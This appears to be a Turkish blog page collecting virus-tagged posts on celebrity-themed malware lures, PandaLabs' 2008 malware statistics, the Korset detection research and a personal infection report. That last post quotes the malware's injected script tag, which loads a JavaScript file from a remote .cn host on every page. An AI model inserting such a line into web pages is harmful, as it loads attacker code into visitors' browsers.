virüs olarak etiketli yazılar
Ünlüler virüs saçıyor.
30 Mar
Sanal suçluların yeni gözdeleri dünyaca ünlü kişiler. Neden mi? İnsanların merak ettikleri ünlülüleri kullanarak virüslü mailleri kullanıcılara daha çok yedirme imkanı sağlamasından tabiki.
Mesela MSNDiablo.A, Nuwar.A ve Wapplex.C gibi solucanlar, ABD başkanı George Bush’un yer aldığı karikatür ve videoları içeren emailler, anlık mesajlaşma iletileri ve web siteleri sayesinde dünya genelinde yayılmış. Piggy.A, Haxdoor.PL, Mops.A, TelnetOn.A, Bobax, Hairy.A, Harrenix.A, RogueMario.A ve Downloader.PSJ tehditlerinin tamamı Üsame bin Ladin, Saddam Hüseyin, Harry Potter, Britney Spears gibi gündemde olan ünlü isimlerin kullanıldığı içerikler sayesinde yayılmış.
Bunun yanında Brad Pitt ismi kullanılan maillerin %12.57 sinde, Tom Cruise ismi ise %12.14 ünde virüs tespit edilmiş.
Bu noktada korunma yolları olarak tavsiyeler ise bilmediğiniz kişiden gelen maillerin açılmaması konusu ne olursa olsun tanımıyorsanız hatta tanıyorsanız bile açmadan önce bir kez daha düşünün.
2008 yılında günlük 35 bin malware türedi..
6 Şub
PandaLabs, Panda Security’nin malware araştırma laboratuvarına 2008’de hergün 22.000 tanesi yeni tehditler olan 35.000 malware örneği rapor edildi.
İspanya bilişim güvenliği sektöründeki firmalara rapor edilen toplam malware sayısı 15 milyonu buldu. Bu sayı ilk kez ortaya çıkan malware sayısını 5 milyon geçmekte. Malware sayısındaki bu patlamanın esas korkutucu yanı PandaLabs’in geçmişteki çalışmalarıyla karşılaştırılıca ortaya çıkıyor. 2008’in ilk 8 ayında, 2008’den önceki 17 yılda rapor edilen malware toplamından daha fazla malware rapor edilmiş.
Malware analiz ve yakalama işlemlerini internet bulutunda yapılmasını sağlayan, Panda Security’nin Collective Intelligence (Ortak Zeka) teknolojisi sayesinde bu yeni tehditlerin yüzde 99’u otomatik olarak yakalanmış.
Bu yeni malware grubunun büyük bir çoğunluğunu yüzde 67,8 ile; banka hesap, kullanıcı adı şifreler gibi özel bilgilerinizi ele geçirmeyi hedef almış olan Trojan’lar oluşturuyor. Tüm taramalarda bulunan tehditlerin yüzde 70,1’ini Trojanları yüzde 19,9 ile Adwareler ve yüzde 4,22 ile Wormlar takip ediyor. Bu üç tehdit gurubu 2008’de yakalanan tüm tehditlerin yüzde 94,2’sini teşkil ediyor.
Malware sayısındaki artışa dikkat çeken PandaLabs’in 2008 yıllık raporu, sahte antimalware programlarına da dikkat çekiyor. Bu tip programlar genelde adware olmakla birlikte gerçekmiş izlenimi veren arayüz tasarımları ile kullanıcıya bilgisayarına gerçekten bir tehdit bulaşmış izlenimi yaratmaya çalışıyor. Bu sahte programların maliyeti 70 dolar civarında olup, kendilerini oluşturan kişilere toplamda 13,65 milyon dolar kazandırmışlar.
Banker Trojanları: Tehlike devam ediyor.
Banker Trojanları 2008’deki en önde gelen tehditlerden biriydi. Normalde bu tip trojanlar bilgisayarın belleğinde sessiz modda çalışırlar ve sadece kullanıcı banka işlemleri ile uğraşırken kendilerini aktive ediyor. PandaLabs’a en çok rapor edilen banker trojanları aşağıdakilerdir:
1) Banbra, Bancos (Brezilya)
2) Cimuz, Goldun (Rusya)
3) Sinowal, Torpig, Bankolimb (Rusya)
Kaynak: ComputerWorld
Virüsler anında sıkıştırılır
12 Eyl
Virüsler anında sıkıştırılır Tel Aviv Üniversitesi’nden iki araştırmacı, bilgisayarların virüsleri anında tanımlayıp engelleyebilmesini sağlayacak bir sistem geliştirdi.
11/09/2008
Anti-virüs programları ne kadar güncel, ne kadar cevval olurlarsa olsunlar, yeni virüs ve tehditleri bulmalarını sağlayacak güncellemelerin yazılması ve yüklenmesi belli bir zaman alır. İşte o arada bilgisayara bir şeyler bulaştıysa iş bitiktir. Ayrıca, virüs taramasının dosyaları tek tek incelemesi bir hayli zaman ve sistem kaynağı tüketir. Tel Aviv Üniversitesi’nden iki araştırmacı olan Avishai Wool ve Ohad Ben-Kohen, virüse karşı savunmayı bu seviyeden bir adım ileri taşıyacak bir sistem kurmuşa benziyor.
“Korset” adı verilen sistem, işletim sisteminin çekirdeğini yeniden derleyerek bazı “anahtar”lar yerleştiriyor. Bu anahtarlar, bilgisayarın “normal” durumlarda nasıl işlediğini analiz edip öğreniyorlar. Yeni yüklenen yazılımlar için “normal” kabul edilen davranışları da belirliyorlar. Bir yazılım “normal” dışı davranışlar göstermeye, örneğin internete bağlanmaya çalıştığı anda, Korset devreye giriyor ve yazılımı durdurarak kullanıcıyı uyarıyor.
Özellikle sunucular için çok faydalı olması beklenen Korset’in, Linux altında çalışan açık kaynaklı bir deneme sürümü bulunuyor.
JS/TrojanDownloader.Iframe.NAL
4 Tem
İki gündür başım bu virüsle belada virüs bulaşma algoritamsı oldukça iyi hazırlanmış. :) herhangi bir internet sayfası açmanız halinde ( i.e yada firefox yada opera farketmiyor) her sayfaya <script src=”http://mx.content-type.cn:443/day.js”></script> kodunu ekleyerek sürekli iframe mantı ile size saldırı yapıyor ve temprory internet files içindeki content.ie5 dosyasına kendisni kopyalıyor. kaspersky virüsün dosayasını silebiliyor ama sayfalara eklediği kod çalışmaya bi şekilde devam ediyor ve öyle bi an geliyoki tüm internetinizi resmen sömürürcesine engelliyor. ve çözümünüde dün akşam itibari ile buldum gerçi kökten bir çözüm değil ama yinede sistemin rahatlamasına yetiyor.
AntiARP denilen bir program kurduğunuzda sorun ortadan kalkıyor gelen paketleri kontrol ederek istenmeyen özelliklere sahip olanları engelleyen bu program bu konuda gerçekten başarılı ;)
Programın Resmi sitesi : http://www.antiarp.com/English/e_index.htm
